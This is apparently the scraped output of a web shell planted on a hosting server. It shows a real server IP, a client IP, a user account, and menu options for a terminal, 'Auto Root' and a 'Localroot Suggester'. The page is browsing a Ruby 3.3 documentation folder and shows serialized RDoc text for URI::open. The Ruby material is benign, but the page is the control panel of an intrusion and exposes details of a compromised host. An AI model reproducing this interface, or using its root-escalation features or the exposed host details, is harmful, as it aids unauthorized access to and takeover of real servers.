Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.37
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby33 /
share /
ri /
system /
URI /
Delete
Unzip
Name
Size
Permission
Date
Action
BadURIError
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
Error
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
FTP
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
File
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
Generic
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
HTTP
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
HTTPS
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
InvalidComponentError
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
InvalidURIError
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
LDAP
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
LDAPS
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
MailTo
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
Parser
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
REGEXP
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
RFC2396_Parser
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
RFC2396_REGEXP
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
Schemes
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
WS
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
WSS
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
_decode_uri_component-c.ri
273
B
-rw-r--r--
2026-04-07 17:22
_encode_uri_component-c.ri
280
B
-rw-r--r--
2026-04-07 17:22
cdesc-URI.ri
6.27
KB
-rw-r--r--
2026-04-07 17:22
decode_uri_component-c.ri
391
B
-rw-r--r--
2026-04-07 17:22
decode_www_form-c.ri
1.73
KB
-rw-r--r--
2026-04-07 17:22
decode_www_form_component-c.ri
1.53
KB
-rw-r--r--
2026-04-07 17:22
encode_uri_component-c.ri
436
B
-rw-r--r--
2026-04-07 17:22
encode_www_form-c.ri
3.76
KB
-rw-r--r--
2026-04-07 17:22
encode_www_form_component-c.ri
1.82
KB
-rw-r--r--
2026-04-07 17:22
for-c.ri
1.21
KB
-rw-r--r--
2026-04-07 17:22
join-c.ri
1.11
KB
-rw-r--r--
2026-04-07 17:22
open-c.ri
1.05
KB
-rw-r--r--
2026-04-07 17:22
parse-c.ri
943
B
-rw-r--r--
2026-04-07 17:22
register_scheme-c.ri
724
B
-rw-r--r--
2026-04-07 17:22
scheme_list-c.ri
677
B
-rw-r--r--
2026-04-07 17:22
split-c.ri
1005
B
-rw-r--r--
2026-04-07 17:22
Save
Rename
U:RDoc::AnyMethod[iI" open:ETI"URI::open;TT:privateo:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"<Allows the opening of various resources including URIs.;To:RDoc::Markup::BlankLine o; ; [I"NIf the first argument responds to the 'open' method, 'open' is called on ;TI"'it with the rest of the arguments.;T@o; ; [I"dIf the first argument is a string that begins with <code>(protocol)://</code>, it is parsed by ;TI"EURI.parse. If the parsed object responds to the 'open' method, ;TI";'open' is called on it with the rest of the arguments.;T@o; ; [I"&Otherwise, Kernel#open is called.;T@o; ; [I"IOpenURI::OpenRead#open provides URI::HTTP#open, URI::HTTPS#open and ;TI" URI::FTP#open, Kernel#open.;T@o; ; [I"JWe can accept URIs and strings that begin with http://, https:// and ;TI"Qftp://. In these cases, the opened file object is extended by OpenURI::Meta.;T: @fileI"lib/open-uri.rb;T:0@omit_headings_from_table_of_contents_below000[ I"(name, *rest, &block);T@#TI"URI;TcRDoc::NormalModule00